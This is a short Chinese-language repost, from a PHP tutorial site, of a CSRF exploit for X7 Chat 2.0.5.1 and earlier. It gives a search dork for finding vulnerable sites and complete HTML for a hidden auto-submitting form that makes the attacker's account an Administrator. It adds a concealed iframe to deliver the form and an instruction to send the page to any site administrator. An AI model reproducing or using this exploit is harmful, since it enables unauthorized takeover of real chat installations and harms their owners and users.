来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 标题: X7 Chat 2.0.5.1 CSRF Add Admin Exploit关键词: intitle:Chat Room Powered By X7 Chat 2.0.5作者: DennSpec 下载地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip影响版本:......
|
标题: X7 Chat 2.0.5.1 CSRF Add Admin Exploit
关键词: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" 作者: DennSpec 下载地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip 影响版本: <= 2.0.5.1 首先注册获得一个用户名 (frame.html in path of your main html page) <html> <body onload="document.xform.submit();"> <form name="xform" action="http:// www.2cto.com /x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post"> <input type="hidden" name="username" value="YOURUSERNAME" /> <input type="hidden" name="usergroup" value="Administrator" /> </form> </body> </html> 替换http://www.2cto.com /x7path/为你的目标地址. 别忘了替换 YOURUSERNAME 到YOURUSERNAME. add this code to inside body tag of main html page: <iframe style="display:none;" src="frame.html"></iframe> and... upload main page and frame.html . 把这个页面传给任意管理员。。。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
